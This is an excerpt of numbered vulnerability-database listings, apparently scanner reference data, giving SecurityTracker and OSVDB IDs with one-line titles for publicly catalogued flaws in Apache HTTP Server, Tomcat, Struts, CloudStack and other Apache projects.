5843| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
5844| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
5845| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
5846| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
5847| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
5848| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
5849|
5850| OSVDB - http://www.osvdb.org:
5851| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
5852| [96077] Apache CloudStack Global Settings Multiple Field XSS
5853| [96076] Apache CloudStack Instances Menu Display Name Field XSS
5854| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
5855| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
5856| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
5857| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
5858| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
5859| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
5860| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
5861| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
5862| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
5863| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
5864| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
5865| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
5866| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
5867| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
5868| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
5869| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
5870| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
5871| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
5872| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
5873| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
5874| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
5875| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
5876| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
5877| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
5878| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
5879| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
5880| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
5881| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
5882| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
5883| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
5884| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
5885| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
5886| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
5887| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
5888| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
5889| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
5890| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
5891| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
5892| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
5893| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
5894| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
5895| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
5896| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
5897| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
5898| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
5899| [94279] Apache Qpid CA Certificate Validation Bypass
5900| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
5901| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
5902| [94042] Apache Axis JAX-WS Java Unspecified Exposure
5903| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
5904| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
5905| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
5906| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
5907| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
5908| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
5909| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
5910| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
5911| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
5912| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
5913| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
5914| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
5915| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
5916| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
5917| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
5918| [93541] Apache Solr json.wrf Callback XSS
5919| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
5920| [93521] Apache jUDDI Security API Token Session Persistence Weakness
5921| [93520] Apache CloudStack Default SSL Key Weakness
5922| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
5923| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
5924| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
5925| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
5926| [93515] Apache HBase table.jsp name Parameter XSS
5927| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
5928| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
5929| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
5930| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
5931| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
5932| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
5933| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
5934| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
5935| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
5936| [93252] Apache Tomcat FORM Authenticator Session Fixation
5937| [93172] Apache Camel camel/endpoints/ Endpoint XSS
5938| [93171] Apache Sling HtmlResponse Error Message XSS
5939| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
5940| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
5941| [93168] Apache Click ErrorReport.java id Parameter XSS
5942| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
5943| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
5944| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
5945| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
5946| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
5947| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
5948| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
5949| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
5950| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
5951| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
5952| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
5953| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
5954| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
5955| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
5956| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
5957| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
5958| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
5959| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
5960| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
5961| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
5962| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
5963| [93144] Apache Solr Admin Command Execution CSRF
5964| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
5965| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
5966| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
5967| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
5968| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
5969| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
5970| [92748] Apache CloudStack VM Console Access Restriction Bypass
5971| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
5972| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
5973| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
5974| [92706] Apache ActiveMQ Debug Log Rendering XSS
5975| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
5976| [92270] Apache Tomcat Unspecified CSRF
5977| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
5978| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
5979| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
5980| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
5981| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
5982| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
5983| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
5984| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
5985| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
5986| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
5987| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
5988| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
5989| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
5990| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
5991| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
5992| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
5993| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
5994| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
5995| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
5996| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
5997| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
5998| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
5999| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
6000| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
6001| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
6002| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
6003| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
6004| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
6005| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
6006| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
6007| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
6008| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
6009| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
6010| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
6011| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
6012| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
6013| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
6014| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
6015| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
6016| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
6017| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
6018| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
6019| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
6020| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
6021| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
6022| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
6023| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
6024| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
6025| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
6026| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
6027| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
6028| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
6029| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
6030| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
6031| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
6032| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
6033| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
6034| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
6035| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
6036| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
6037| [86901] Apache Tomcat Error Message Path Disclosure
6038| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
6039| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
6040| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
6041| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
6042| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
6043| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
6044| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
6045| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
6046| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
6047| [85430] Apache mod_pagespeed Module Unspecified XSS
6048| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
6049| [85249] Apache Wicket Unspecified XSS
6050| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
6051| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
6052| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
6053| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
6054| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
6055| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
6056| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
6057| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
6058| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
6059| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
6060| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
6061| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
6062| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
6063| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
6064| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
6065| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
6066| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
6067| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
6068| [83339] Apache Roller Blogger Roll Unspecified XSS
6069| [83270] Apache Roller Unspecified Admin Action CSRF
6070| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
6071| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
6072| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
6073| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
6074| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
6075| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
6076| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
6077| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
6078| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
6079| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
6080| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
6081| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
6082| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
6083| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
6084| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
6085| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
6086| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
6087| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
6088| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
6089| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
6090| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
6091| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
6092| [80300] Apache Wicket wicket:pageMapName Parameter XSS
6093| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
6094| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
6095| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
6096| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
6097| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
6098| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
6099| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
6100| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
6101| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
6102| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
6103| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
6104| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
6105| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
6106| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
6107| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
6108| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
6109| [78331] Apache Tomcat Request Object Recycling Information Disclosure
6110| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
6111| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
6112| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
6113| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
6114| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
6115| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
6116| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
6117| [77593] Apache Struts Conversion Error OGNL Expression Injection
6118| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
6119| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
6120| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
6121| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
6122| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
6123| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
6124| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
6125| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
6126| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
6127| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
6128| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
6129| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
6130| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
6131| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
6132| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
6133| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
6134| [74725] Apache Wicket Multi Window Support Unspecified XSS
6135| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
6136| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
6137| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
6138| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
6139| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
6140| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
6141| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
6142| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
6143| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
6144| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
6145| [73644] Apache XML Security Signature Key Parsing Overflow DoS
6146| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
6147| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
6148| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
6149| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
6150| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
6151| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
6152| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
6153| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
6154| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
6155| [73154] Apache Archiva Multiple Unspecified CSRF
6156| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
6157| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
6158| [72238] Apache Struts Action / Method Names <
6159| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
6160| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
6161| [71557] Apache Tomcat HTML Manager Multiple XSS
6162| [71075] Apache Archiva User Management Page XSS
6163| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
6164| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
6165| [70924] Apache Continuum Multiple Admin Function CSRF
6166| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
6167| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
6168| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
6169| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
6170| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
6171| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
6172| [69520] Apache Archiva Administrator Credential Manipulation CSRF
6173| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
6174| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
6175| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
6176| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
6177| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
6178| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
6179| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
6180| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
6181| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
6182| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
6183| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
6184| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
6185| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
6186| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
6187| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
6188| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
6189| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
6190| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
6191| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
6192| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
